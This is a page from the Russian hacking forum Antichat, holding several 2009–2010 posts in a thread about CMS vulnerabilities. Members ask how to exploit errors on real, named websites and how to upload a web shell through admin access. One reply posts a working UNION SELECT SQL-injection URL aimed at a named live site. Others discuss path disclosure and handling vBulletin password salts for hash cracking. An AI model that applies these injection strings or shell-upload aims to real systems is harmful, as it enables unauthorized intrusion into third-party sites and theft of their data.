ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #211  
Старый 24.11.2009, 23:13
Аватар для growhel
growhel
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме:
9584

Репутация: 0
По умолчанию

http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?
 
Ответить с цитированием

  #212  
Старый 25.11.2009, 01:06
Аватар для S[N]EP
S[N]EP
Познающий
Регистрация: 29.08.2008
Сообщений: 86
Провел на форуме:
789539

Репутация: 53
По умолчанию

кто нибудь знает как залить шел в Instantcms, доступ в админку есть.
 
Ответить с цитированием

  #213  
Старый 25.11.2009, 01:15
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от growhel  
http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto


возможно что нибудь сделать?
это хотяб бы баг?
Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
 
Ответить с цитированием

  #214  
Старый 25.11.2009, 01:57
Аватар для growhel
growhel
Новичок
Регистрация: 23.11.2009
Сообщений: 2
Провел на форуме:
9584

Репутация: 0
По умолчанию

www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал
 
Ответить с цитированием

  #215  
Старый 25.11.2009, 09:21
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от growhel  
www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru& next_page=account.shipping&page=account.shipto

оригинал
Эм
Код:
Ошибка: У Вас нет прав для доступа к этому модулю.
Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
 
Ответить с цитированием

  #216  
Старый 03.01.2010, 19:57
Аватар для FaTRuS
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
 
Ответить с цитированием

  #217  
Старый 03.01.2010, 20:39
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
есть ошибка
Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
которая появляется если сделать запрос типа
http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
что можно с этого поиметь???
Ты уже поимел из нее все что можно,а именно - раскрытие пути.
Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
 
Ответить с цитированием

  #218  
Старый 03.01.2010, 20:43
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от ErrorNeo  
сабж
касается солей хэшей в Vbulletin

в Vbulletin нередко имеют место 4-ех символьные соли.
Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.

примеры 4-символьных солей
VBulletin:

Код:
C\"Y
FD\\
=\"a
\"]O
\\@n
\\|t
Dy\\
J\\,
@\\%
.m\\
X\"K
w\"P
\"hH
\\mz
@\"B
b7\\
y\\b
s\"#
tW\"
Q!\\
\">2
_\"P
\\tP
\\gq
F\'4
примеры 3-символьных солей VBulletin со слэшем:
Код:
YD\
],\
W$\
]_\
Dd\
вопрос:
в каких случаях слэш экранирует сам себя, а в каких нет?
Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:
Код:
\'*( - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью.
(&\\ - слуш экранируеться,так как последний слеш являеться частью соли.
Подругому не бывает
ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();

Последний раз редактировалось m0Hze; 03.01.2010 в 20:47..
 
Ответить с цитированием

  #219  
Старый 03.01.2010, 21:16
Аватар для FaTRuS
FaTRuS
Познающий
Регистрация: 28.08.2006
Сообщений: 94
Провел на форуме:
327555

Репутация: 1
Отправить сообщение для FaTRuS с помощью ICQ
По умолчанию

www.prima-group.kz
 
Ответить с цитированием

  #220  
Старый 03.01.2010, 21:29
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Цитата:
Сообщение от FaTRuS  
www.prima-group.kz
http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20info rmation_schema.tables+--+
SQL-inj+inc.Раскрутить не смог.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Форумы 316 08.06.2010 09:56
Proxy FAQ foreva Чужие Статьи 12 04.01.2008 12:15
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP, PERL, MySQL, JavaScript 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ